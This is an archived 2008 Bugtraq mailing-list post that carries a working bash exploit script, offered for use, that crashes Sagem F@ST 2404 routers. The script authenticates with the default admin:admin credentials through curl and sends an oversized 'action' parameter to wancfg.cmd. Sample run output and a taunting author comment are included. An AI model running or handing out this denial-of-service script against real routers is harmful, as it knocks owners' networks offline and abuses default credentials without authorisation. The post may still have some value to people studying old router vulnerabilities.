[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-Id: <200809081335.m88DZpUb020595@www5.securityfocus.com>
Date: Mon, 8 Sep 2008 07:35:51 -0600
From: zigma@...erz0ne.net
To: bugtraq@...urityfocus.com
Subject: Sagem Router F@ST 2404 Remote Denial Of Service Exploit
# Sagem Router F@ST 2404 Remote Denial Of Service Exploit
# Discovery Date : 01/09/2008
#!/usr/bin/bash
#
# Author    : Underz0ne Crew [Underz0ne.net]
#             Zigma 
#
# Severity  : Medium 
#
# CVE       : Not assigned
#
# Example   :
# 
# Zigma@...erz0ne # ./sagem2404.sh 192.168.1.1
# 
# Sagem Router F@ST 2404 Remote Denial Of Service Exploit 
# 
# By Underz0ne Crew 
#
# [+] DoSing Sagem 2404 ...
# [+] Done !
# [+] cya
#
# Zigma@...erz0ne # nc -vvn 192.161.1.1 80
# (UNKNOWN) [192.168.1.1] 80 (?) : Connection refused
#  sent 0, rcvd 0
#
# Tested on 3 Sagem routers F@ST 2404 all got crashed ! 
#
#PS: M7at7et w mrayech .. Man get a fucking life !! 
#
IP=$1
                echo -e "\n Sagem Router F@ST 2404 Remote Denial Of Service Exploit "
                echo -e "\n By Underz0ne Crew "
if [ "$IP" = "" ];then
                echo -e "\n USAGE  : $0 [IP]\n"
                echo -e "\n Example: $0 192.168.1.1\n "
                exit
fi;
                echo -e "\n[+] DoSing Sagem 2404 ..."
# By default the username of sagem's router is Admin so then the pass , sagem uses HTTP Authentication it can be so easly cracked or sniffed !!
curl -u admin:admin "$1/wancfg.cmd?action=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                echo -e "\n [+] Done ! "
                echo -e "\n [+] Cya    "
exit 
Powered by blists - more mailing lists
 
